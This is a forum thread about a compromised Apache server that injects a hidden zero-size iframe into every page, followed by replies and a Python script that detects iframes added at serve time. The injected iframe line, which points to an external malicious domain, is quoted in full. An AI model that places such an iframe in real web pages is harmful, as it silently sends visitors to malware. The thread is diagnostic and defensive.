A virus problem.

enginaar

Hello,

I have a virus problem on my web server, which runs Red Hat 9.

When I want to browse a website which is on the web server, Norton catches and finds HTMLREdir.exploit on adv121.php, but there is no adv121.php file on the machine.

Also, when I want to browse my site (this happens only when browsing the sites that are on my server), the browser tries to open other links that contain malicious scripts.

Please help.
 
Yeah. I know what you are talking about. I'm not a lamer.

This is a problem in httpd. There is a module that adds the line

"<iframe src="http://www.splitinfinity.info/fa/?d=get" width=0 height=0></iframe>"

to all HTML pages at run time. Those HTML files don't contain any line like the one above in their code. There must be a module added to Apache to make these changes.

Look at the address below with two different browsers (Konqueror and IE, maybe). You will see that it is true.

http://www.cozumteknik.com

I've reinstalled Apache but nothing changed. How can I get rid of it?

Anyone help???
 
This may indeed not be spyware.

I tried loading http://www.cozumteknik.com into Mozilla and had no problem. The source code did NOT show the section beginning with "<iframe". Nothing popped up.

But I also tried it on Konqueror. When I did, the popup did occur on my system.

But the source code still doesn't show the "<iframe" code.

enginaar, when you reinstalled the httpd daemon, did you also reinstall httpd.conf?

Did you check for, for example, the cozumteknik.com specific httpd.conf file?

Jeff
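
The comparison discussed in this thread (the page as stored on disk against what each browser actually receives) can be automated. The following is an added example, not code from any poster: the function names, the `injected.example` URL and the sample bodies are constructed for illustration, and in practice each body would be fetched with the corresponding User-Agent header.

```python
from html.parser import HTMLParser


class _IframeCollector(HTMLParser):
    """Collects (src, width, height) for every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            a = {k: (v or "") for k, v in attrs}
            self.frames.append((a.get("src", ""), a.get("width", ""), a.get("height", "")))


def iframes(html):
    collector = _IframeCollector()
    collector.feed(html)
    return collector.frames


def is_hidden(frame):
    """True for zero-sized frames such as width=0 height=0."""
    _, width, height = frame
    return width.strip() in ("0", "0px") or height.strip() in ("0", "0px")


def injected_frames(on_disk, served_by_agent):
    """Map each User-Agent label to the iframes found in the served body
    but not in the file on disk, each paired with a hidden-frame flag."""
    known = set(iframes(on_disk))
    report = {}
    for agent, body in served_by_agent.items():
        extra = [f for f in iframes(body) if f not in known]
        if extra:
            report[agent] = [(f[0], is_hidden(f)) for f in extra]
    return report


# Constructed sample data: the stored file and the bodies two browsers received.
ON_DISK = "<html><body><h1>Welcome</h1></body></html>"
SERVED = {
    "Mozilla": ON_DISK,
    "Konqueror": '<html><body><iframe src="http://injected.example/?d=get" width=0\n'
                 "height=0></iframe><h1>Welcome</h1></body></html>",
}

if __name__ == "__main__":
    for agent, frames in injected_frames(ON_DISK, SERVED).items():
        print(agent, frames)
```

A non-empty report for only some User-Agents means the markup is being added at serve time and selectively, which points at the server configuration and loaded modules rather than the site's files.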
 